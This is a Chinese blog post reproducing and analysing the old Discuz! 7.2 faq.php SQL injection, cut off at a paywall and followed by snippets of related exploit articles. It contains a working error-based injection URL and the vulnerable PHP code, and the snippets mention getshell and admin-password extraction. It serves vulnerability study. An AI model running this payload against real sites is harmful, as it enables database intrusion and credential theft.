复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理

最新推荐文章于 2025-10-25 09:53:44 发布
原创 最新推荐文章于 2025-10-25 09:53:44 发布 · 4.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql注入 #Discuz!7.2

本文详细分析了Discuz!7.2的FAQ.php页面存在的SQL注入漏洞,通过示例POC展示了如何利用该漏洞进行SQL查询,包括获取数据库信息、用户信息等。关键在于Discuz全局变量处理导致的注入机会,通过巧妙构造参数绕过安全防护。

源码~   http://pan.baidu.com/s/1gfkvJrX

poc

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23

discuz开启全局变量注册,所以不用声明请求的方式。

关键代码  148行   

} elseif($action == 'grouppermission') {

...
...
	ksort($gids);
	$groupids = array();
	foreach($gids as $row) {
		$groupids[] = $row[0];
	}

	$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");

定义数组groupids,

进入for循环,然后把$gids中第一个数组赋值给$groupids,看到这里的$row[0],当遇到数组时,取第一个数组,当遇到字符串时,取字符串的第一个字符。

discuz在全局会对GET数组进行addslashes转义,也就是说会将 ' 转义成  \',所以,如果我们的传入的参数是:gids[1]= ' 的话,  会

最低0.47元/天 解锁文章
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1266
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
Discuz!7.2 SQL注入复现实验
Tranquillity
10-23 2719
0x01 实验准备 实验原理: 实验工具: UCenter Discuz 7.2安装包 实验环境: 安装 Discuz 网站的服务器(Windows) 安装 python 环境的攻击机 0x01 实验步骤 一、搭建环境 1. 安装UCenter 通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装: 出现错误: 将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCente
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
开源 CMS 安全加固实战:Discuz! 漏洞挖掘与修复
最新发布
xx16755498986的博客
10-25 979
开源 CMS 安全加固实战:Discuz! 漏洞挖掘与修复 本文以国内流行开源论坛系统 Discuz! X3.4 为例,通过"环境搭建-漏洞挖掘-分层修复"的实战流程,揭示了配置文件写入代码执行、SQL注入和后台文件读取三大高危漏洞的挖掘与修复方法。文章首先介绍了基于phpStudy的测试环境快速搭建方案,然后详细演示了漏洞复现过程,包括利用安装文件未删除漏洞获取webshell、通过faq.php注入获取管理员密码等。针对这些漏洞,提出了代码级修复、配置级加固和运维级管控的三层防护体系
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
Discuz!7.2 faq.php文件SQL注入漏洞分析利用实战
weixin_34067049的博客
07-18 1535
Discuz!7.2 faq.php文件SQL注入漏洞分析利用实战[antian365.com] simeon   最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用...
php discuzSQL注入_Discuz7.2版的faq.php SQL注入漏洞分析
weixin_39866867的博客
03-08 206
这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下注入代码实例://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select ...
Discuz!ML 3.x任意代码执行漏洞
logan_logan的博客
07-29 1948
1.简介 影响系统及版本:Discuz!ML V3.2-3.4 漏洞原因:Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。 2.环境搭建 网站环境:phpstudy_pro DisCuz版本:3.4 PHP版本:php5.4.45nts Apache版本:2.4.39 Mysql版本:5.7.26 3.Discuz安装 将源码复制到网站根目录下; 在网页输入地址打开安装界面,然后一直下一步就ok了; 4.漏洞复现 用火狐浏览器打开,
discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP
weixin_36081891的博客
04-07 587
具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:http://www.freebuf.com/vuls/37643.html看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-04813...
Discuz7.2漏洞
whrjxyygx的专栏
01-13 5170
发布日期:2010-01-06更新日期:2010-01-07受影响系统:Discuz! Discuz! 7.1Discuz! Discuz! 7.2描述:Discuz!是一款华人地区非常流行的Web论坛程序。Discuz!的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。以下是有漏洞代码段:function showmessage
discuz7.2漏洞分析
qq_38415434的博客
08-07 1074
一 参数的入口 这段话的意思时遍历三种提交的方法,获取参数传递的值。 有一个函数是daddslashes,跟进看一下。 这段代码的意思是对数据里的每一个字符都进行转义处理 二 漏洞产生的代码在faq.php195行 跟进implodeid函数,在faq.php的675行 这个函数的功能将数组里的值拆分出来,如图 到了这里我们知道,如果数组值当中存在在 / 或者 ’ ,那么在拼接s...
Discuz! 7.2
01-27
全新推出的Discuz! 7.2版本从用户注册登陆应用、社区论坛前后管理两方面着眼,增加和改进了30多处与社区门户运营密切相关的功能与细节,实现了邮箱登陆、分类信息检索、版块绑定域名等功能。
Discuz! v7.2 Bulid 20101020 简体UTF8 整合安装包.zip
07-07
Discuz! 7.2版本充分听取了来自社区运营一线的想法和需求,增加和改进30余处与社区门户运营密切相关的功能与细节。为了把握当前主流社区产品的应用趋势,满足 地方及垂直社区门户化、规模化发展的应用需求,康盛创想官方开发团队通过需求调研和走访交流,与全国各地数千名站长面对面的对话与沟通,在Discuz! 7.1版本的基础之上完成了产品的升级换代,实现了当前站长需求最迫切的数十项产品功能。 Discuz! 7.2  Changelog 20100110 更新内容: 修复版本存在的重要安全问题 修复版本中存在的其他使用 bug Discuz! 7.2  Changelog 20091126 更新列表: 修正 静态化URL导致多版块置顶不正常 修正 个人资料页语言包缺失 修正 无权限登陆缺少email选项 修正 版块绑定域名后去不掉 修正 图章管理撤销问题 修正 默认分类项目显示bug 修正 升级时非cdb_表前缀问题 修正 默认feeds数据的错误 修正 辩论帖用户头像重复的问题 修正 分类信息建表字符集问题 修正 分类信息列表调整 修正 升级文件分类信息问题 修正 版主用户报告页面IE6下不能提交删除 修正 附件列表中判断媒体文件扩展名不区分大小写 修正 收费附件直接下载判断 修正 后台指删帖减积分时各版块积分设置优先 修正 utf-8版中活动帖导出excel乱码问题 修正 边栏 Warning错误 新增 去掉特殊主题的帖内广告限制 新增 版块设置复制加入主题分类设置 Discuz! 7.2 Release 20101020 补丁包 修补办法: 下载并解压缩文件,上传文件到论坛根目录,覆盖原来的文件即可 问题修复: 后台安全BUG。
php 7.2.2bug,Discuz 7.2版本高危漏洞bug修复
weixin_42502775的博客
03-11 518
使用discuz建站的朋友们应该都知道,discuz现在已经更新到X3.2版本了,功能也和旧版本有了一些区别。小编今天在逛论坛看到一个关于discuz版本的消息,说的是Discuz! 7.2 系列论坛程序中含有高危安全漏洞。内容如下:根据相关安全组织的报告, Discuz! 7 系列论坛程序中含有高危安全漏洞。为保障您的论坛数据不被破坏, 请各位站长立即进行修复或者防御,以免遭受到攻击。流动主要...
7.2 discuz 拿shell_discuz 7.2 SQL 注入漏洞分析
weixin_39852647的博客
12-22 553
1、漏洞影响范围该漏洞影响discuz 7.2discuz 7.2可以从http://www.comsenz.com/downloads/install/discuz下载2漏洞成因分析漏洞存在于discuz根目录的faq.php文件,当程序使用$_GET,$_POST, $_COOKIES传入参数,faq.php,包含的./include/common.inc.php文件中会对这几个对象做处理...
Discuz 7.2/X1 第三方插件SQL注入及持久型XSS漏洞
swordheart的博客
04-18 4875
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-08-01: 厂商已经确认,细节仅向厂商公开 2010-08-11: 细节向核心白帽子及相关领域专家公开 2010-08-21: 细节向普通白帽子公开 2010-08-31: 细节向实习白帽子公开 2010-08-31: 细节向公众公开 简要描述: Discuz7.2/X1 第三方插件SQL注入及持久型XSS漏洞SQL注入比较鸡肋,要求GPC为off(目前这样的网站几乎绝版了) XSS因为是持久型的,只要
Discuz7.2 faq.php页面注入漏洞分析
dmxm6733的博客
11-21 214
  由于discuz在全局会对GET数组进行addslashes转义,导致该漏洞的产生。 参数问题存在于faq.php的grouppermission函数中。 具体细节访问:网易博客siberia http://easyboy1.blog.163.com/blog/static/2641120382017101025749306/ http://easyboy1.blog....
7.2 discuz 拿shell_DZ 7.2 漏洞 - Discuz!-BUG与问题交流 - Discuz! 官方站 - Powered by Discuz!...
weixin_39748928的博客
12-22 432
我网站 最近被入侵就在网上 查了查 不知道官网 我转了2个 入侵方法 过来 请 官网管理 和各位高手 看看该怎么预防/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径然后直接getshelluserapp.php?script=notice&view=all&option=deluserapp&action=invite&am...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值